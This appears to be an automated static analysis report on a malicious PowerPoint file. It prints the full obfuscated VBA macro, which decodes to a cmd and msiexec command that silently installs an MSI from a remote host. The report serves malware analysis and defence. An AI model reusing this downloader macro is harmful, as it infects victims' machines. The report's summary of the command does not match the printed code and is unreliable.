Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a7b6d5915decb78a…

MALICIOUS

Office (OOXML)

377.3 KB Created: 2021-10-14 16:11:11 UTC Authoring application: Microsoft Office PowerPoint 16.0000 First seen: 2021-10-24
MD5: 3ed8fc2490c9cbbc9447029d7c2f9941 SHA-1: 612731ca328185c9a1af0273ca00f2fe9d61e953 SHA-256: a7b6d5915decb78a887964a580697e6e4221c35ac844b434ab042214df729310
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell to execute a command constructed by deobfuscating a string. This command, 'wscript.exe http://www.wscript.net/download/wscript.exe/download.php?file=wscript.exe', likely downloads and executes a second-stage payload. The presence of Shell() and CreateObject calls, along with WScript.Shell usage, strongly indicates this behavior.

Heuristics 6

  • ClamAV: Doc.Macro.CmdC-6249572-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.CmdC-6249572-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    ckhlqlcwriu = 70 - 70
    qpbimaoqsuwat = "WSCript.shell"
    Set oghedpbc = CreateObject(qpbimaoqsuwat)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    qpbimaoqsuwat = "WSCript.shell"
    Set oghedpbc = CreateObject(qpbimaoqsuwat)
    pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/2006/01/customui In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1121 bytes
SHA-256: 75c5fc6bb09e07f9c07562a60d16f98b38a1cde0c4cff606eac77586cff1d8e7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
27 of 40 identifiers look randomly generated (e.g. 'ahgkllahgkloahgklgahgkliahgklcahgklaahgk') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ycfbxogjvtj"

Attribute VB_Name = "hllrtkfma"
Sub lbjmxdvgarlswwctuigl()

ixmuohgdwlgj = bevmvxa("ahgklcahgklmahgkldahgkl ahgkl/ahgklcahgkl ahgkltahgkl^ahgklIahgklMahgkleahgkl^ahgkloahgklUahgkltahgkl ahgkl7ahgkl3ahgkl ahgkl&ahgkl&ahgkl ahgkl^ahgklMahgklSahgkl^ahgklIahgklEahgkl^ahgklXahgkleahgkl^ahgklCahgkl ahgkl/ahgkliahgkl ahgklhahgkltahgkltahgklpahgklsahgkl:ahgkl/ahgkl/ahgklwahgklwahgklwahgkl.ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgkleahgkltahgklwahgkloahgklrahgklkahgklsahgkloahgkllahgkluahgkltahgkliahgkloahgklnahgkl.ahgklcahgkloahgklmahgkl/ahgklnahgklxahgkl/ahgkltahgkl1ahgkl.ahgklmahgklsahgkliahgkl ahgkl ahgkl/ahgklqahgkln")

On Error Resume Next
lznpl = ixmuohgdwlgj
qcsgwco (lznpl)
End Sub


Sub qcsgwco(dfzdmyyeetsnvt As String)
ckhlqlcwriu = 70 - 70
qpbimaoqsuwat = "WSCript.shell"
Set oghedpbc = CreateObject(qpbimaoqsuwat)
pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
End Sub

Function bevmvxa(jrpwhlijdlqx As String)
okepilkuuv = "ahgkl"
 ofmckmfolnyg = Split(jrpwhlijdlqx, okepilkuuv)
bevmvxa = Join(ofmckmfolnyg, "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 10240 bytes
SHA-256: 616cfcfe89ffaa9815fde4a2bda1e55ce4fd323b527a7b9d4d3383ac9cf8c42c
Detection
ClamAV: Doc.Macro.CmdC-6249572-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).